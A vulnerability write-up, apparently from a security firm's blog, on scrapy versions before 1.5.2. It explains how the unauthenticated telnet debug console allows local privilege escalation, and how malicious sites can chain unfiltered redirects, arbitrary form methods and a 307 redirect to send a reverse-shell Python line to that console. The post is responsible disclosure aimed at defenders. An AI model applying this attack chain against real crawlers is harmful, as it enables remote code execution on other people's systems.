Disclaimer: scrapy 1.5.2 has been released on January 22th, to avoid being exploited you must disable telnet console (enabled by default) or upgrade up to 1.5.2 at least.

This year the focus of our research will be security in web scraping frameworks. Why? Because it’s important for us. As a little context, between 2012 and 2017, I’ve worked at the world leader Scrapinghub programming more than 500 spiders. At alertot we use web spiders to get fresh vulnerabilities from several sources, then it’s a core component in our stack.

We use scrapy daily and most of the vulnerabilities will be related to it and its ecosystem in order to improve its security, but we also want to explore web scraping frameworks in other languages.

As a precedent, 5 years ago I discovered a nice XXE vulnerability in scrapy and you can read an updated version of that post here.

Ok, let’s go with the new material!

Just to clarify, the vulnerabilities exposed in this post affect scrapy < 1.5.2 . As mentioned in the changelog of scrapy 1.6.0, scrapy 1.5.2 introduced some security features in the telnet console, specifically authentication, which protects you from the vulnerabilities I’m going to reveal.

Debugging by default

Getting started with scrapy is easy. As you can see from the homepage, you can run your first spider in seconds and the log shows information about enabled extensions, middlewares and other options. What always has called my attention is a telnet service enabled by default.

[scrapy.middleware] INFO: Enabled extensions:

[‘scrapy.extensions.corestats.CoreStats’,

‘scrapy.extensions.telnet.TelnetConsole’,

‘scrapy.extensions.memusage.MemoryUsage’,

‘scrapy.extensions.logstats.LogStats’]

[…]

[scrapy.extensions.telnet] DEBUG: Telnet console listening on 127.0.0.1:6023

It’s the telnet console running on port 6023 , which purpose is to make debugging easier. Usually telnet services are restricted to a set of functions but this console provides a python shell in the context of the spider, which makes it powerful for debugging and interesting if someone gets access to it.

To be sincere, it’s not common to turn to the telnet console. I’ve used it to debug spiders either running out of memory (in restricted environments) or taking forever, totalling around 5 out of 500+ spiders.

My concern was that console was available without any authentication, then any local user could connect to the port and execute commands in the context of the user running the spider. The first proof of concept is to try to exploit this local privilege escalation (LPE) bug.

An easy LPE

To demonstrate this exploitation, there are two requirements:

The exploiter has access to the system. There’s a spider running and exposing the telnet service. The following spider meets this requirement, making an initial request and then idling because of the download_delay setting.

Our exploit is simple:

It defines a reverse shell, connects to the telnet service and sends a line to execute the reverse shell using Python’s os.system . I’ve created the next video to show this in action!

Now, we’re going to begin our journey to pass from this local exploitation to a remote exploitation!

Taking control of spider’s requests

Below there’s a spider created by the command scrapy genspider example example.org .

It contains some class attributes and one of them is allowed_domains . According to the documentation, it is defined as:

An optional list of strings containing domains that this spider is allowed to crawl. Requests for URLs not belonging to the domain names specified in this list (or their subdomains) won’t be followed if OffsiteMiddleware is enabled.

Then, if the spider tries to make a request to example.edu , it will be filtered and displayed on the log:

[scrapy.spidermiddlewares.offsite] DEBUG: Filtered offsite request to ‘example.edu’: http://example.edu

However, an interesting behavior happens when there’s a request to a page in an allowed domain but redirects to a not allowed domain, since it won’t be filtered and will be processed by the spider.

As reported here and in many other issues, it’s a known behavior. Paul Tremberth put some context on the issue and there are some possible fixes (i.e. 1002) but nothing official.

That’s an unintended behavior but under security scrutiny it’s something. Imagine that there’s a dangerous.tld website and you want to create a spider that logs in to the user area. The server side logic would be like this:

The template login.html used on route / displays a form with action=/login . A sample spider for the website would be:

An overview of the steps are:

The spider sends a GET request to http://dangerous.tld/ at line 8. At line 11, it sends a POST request using FormRequest.from_response that detects automatically the form in the web page and sets the form values based on formdata dictionary. At line 18 the spider prints that the authentication was successful.

Let’s run the spider:



[scrapy.core.engine] DEBUG: Crawled (200) <POST

authenticated

[scrapy.core.engine] INFO: Closing spider (finished) [scrapy.core.engine] DEBUG: Crawled (200) http://dangerous.tld/ > (referer: None)[scrapy.core.engine] DEBUG: Crawled (200) http://dangerous.tld/login > (referer: http://dangerous.tld/ authenticated[scrapy.core.engine] INFO: Closing spider (finished)

Everything is fine, the spider is working and logs in successfully. What about the website becoming a malicious actor?

Abusing of allowed_domains behavior, the malicious actor could manage that the spider sends requests to domains of its interest. To demonstrate this, we will review the spider steps. The first step of our spider creates a GET request to / and the original code for the home endpoint is:

However, the website (now malicious) changes the logic to:

Running again the spider gives us the following output:



[scrapy.core.engine] DEBUG: Crawled (200) <GET http://example.org> (referer: None)

[scrapy.core.scraper] ERROR: Spider error processing <GET [scrapy.downloadermiddlewares.redirect] DEBUG: Redirecting (302) to http://example.org > from http://dangerous.tld/ [scrapy.core.engine] DEBUG:(referer: None)[scrapy.core.scraper] ERROR: Spider error processing http://example.org > (referer: None)

Despite the error, indeed the spider has requested http://example.org with a GET request. Moreover, it’s also possible to redirect the POST request (with its body) created in step 2 using a redirect with code 307.

Actually, it’s some class of SSRF that I’d name “Spider Side Request Forgery” (everyone wants to create new terms 😃). It’s important to note some details about the environment:

Usually a spider is only scraping one website, then it’s not common that a spider is authenticated on another website/domain. The spider requests the URL and likely there’s no way to get back the response (it’s different from common SSRF). Until now, we can control only the full URL and maybe some part of the body in a POST request.

In spite of all these constraints, this kind of vulnerability, as well as SSRF, opens a new scope: the local network and localhost. Certainly we don’t know about services in the local network, so the key question is: what’s surely running on localhost, unauthenticated and provides code execution capabilities? The telnet service!

Let’s speak telnet language

Now, we’re going to redirect the requests to localhost:6023 .

Running the spider against this malicious actor gives us a lot of errors:



[scrapy.downloadermiddlewares.retry] DEBUG: Retrying <GET

re twisted.web._newclient.ParseError: (‘non-integer status code’, b’\xff\xfd”\xff\xfd\x1f\xff\xfd\x03\xff\xfb\x01\x1bc>>> \x1b[4hGET / HTTP/1.1\r\r’)

>]

Unhandled Error

Traceback (most recent call last):

Failure: twisted.internet.error.ConnectionDone: Connection was closed cleanly. [scrapy.downloadermiddlewares.redirect] DEBUG: Redirecting (302) to http://localhost:6023 > from http://dangerous.tld/ [scrapy.downloadermiddlewares.retry] DEBUG: Retrying http://localhost:6023 > (failed 1 times): [ >> \x1b[4hGET / HTTP/1.1\r\r’)>]Unhandled ErrorTraceback (most recent call last):Failure: twisted.internet.error.ConnectionDone: Connection was closed cleanly.

It seems that the number of errors is equal to the number of lines of our GET request (including headers), then we are reaching the telnet port but not sending a valid Python line. We need more control of sent data since GET instruction and headers don’t meet Python syntax. What about the body part of the POST request sending the login credentials?

Let’s come back to the original version of home route and try to exploit the login form logic.

Posting to telnet

The idea of using a POST request is to handle the request’s body, as near the start as possible to build a valid Python line. The argument formdata passed to FormRequest.from_response will update the form values, adding these new values at the end of the request’s body. That’s great, the malicious actor could add a hidden input to the form and it would be at the start of request’s body.

The request’s body sent by the spider starts with malicious=1 , however FormRequest.from_response encodes with URL-encoding every input then it’s not possible to build a valid Python line.

After that, I tried with form enctype but FormRequest doesn’t care about that value and just sets Content-Type: application/x-www-form-urlencoded . Game over!

Is it possible to send a POST request without an encoded body? Yes, using the normal Request class with method=POST and set body. It’s the way to send POST requests with a JSON body but I don’t consider that a real scenario where the malicious actor could have control of the body of that request.

Something more to try? I know that the method should be a list of valid values ( GET, POST, etc ) but let’s try if scrapy is compliant with that. We’re going to modify the form method to gaga and see the output of the spider:

[scrapy.core.engine] DEBUG: Crawled (200) <GET http://dangerous.tld/> (referer: None)

[scrapy.core.engine] DEBUG: Crawled (405) <GAGA http://dangerous.tld/login?username=user&password=secret> (referer: http://danger

ous.tld/)

It doesn’t validate that the method of the form is valid, good news! If I create a HTTP server supporting GAGA method, I could send a redirect to localhost:6023/payload and this new request with GAGA method will reach the telnet service. There’s hope for us!

Creating the Python line

The idea is to create a valid line and then try to comment the remainder of the line. Taking into account how a HTTP request is built and the idea of a custom HTTP server, the line sent to the telnet console eventually will be:

GAGA /payload HTTP/1.1

As seen in previous output, scrapy has uppercased my method gaga to GAGA , then I can’t inject immediately Python code because it will be invalid. As the method will be always first, the only option I saw was to use a method like GET =' to create a valid string variable and then in the URI put the closing apostrophe and start my Python code.

payload is Python code and can be separated by semicolons. The idea of commenting the remainder of the line after payload is not possible since scrapy deletes the character # . The remainder is HTTP/1.1 , then if I declare HTTP as a float, it would be a valid division and won’t raise any exception. The final line would look like this:

Glueing everything together

The payload section is special:

It can’t contain any space. The scope is limited i.e. the variable GET doesn’t exist in payload scope. Some characters like < or > are url-encoded.

Taking in consideration these limitations, we’re going to build our payload as this:

At line 1 we define our reverse shell, at line 2 we encode it in base64 encoding and we use the magic function __import__ to import the modules os and base64 that eventually allow to execute our reverse shell as a command.

Now, we have to create a webserver capable of handling this special GET =' method. Since popular frameworks don’t allow that (at least with ease), as well as in the XXE exploitation, I had to hack the class BaseHTTPRequestHandler from http module to serve the valid GET and the invalid GET =' requests. The custom web server is below:

The important pieces are:

Line 11 serves malicious_login.html template when the server receives the GET request to the endpoint / . What is different in this malicious_login.html file? Our special method!

At line 33 it’s the start of the method handle_one_request from the parent class. It’s almost the same, except that at line 52 we detect that the form was sent (seeing that there’s an username string in the URI).

from the parent class. It’s almost the same, except that at line 52 we detect that the form was sent (seeing that there’s an string in the URI). At line 18, we define our malicious logic. First, we set a 307 redirect code, that way it keeps our weird method and it’s not changed. Then, we build our payload and send a Location header to the spider, that way it will hit the telnet service.

Let’s see this in action!

Conclusion

After this unexpected exploitation, I’m going to create some issues on Github to address the issues related to unfiltered redirections and invalid form methods.

I really liked the decision took on scrapy 1.5.2 since they added authentication to the telnet service with user/password and if the password is not set, they create a random and secure one. It’s not optional security, it’s security by design.

I hope you enjoyed this post and stay tuned for the following part of this research!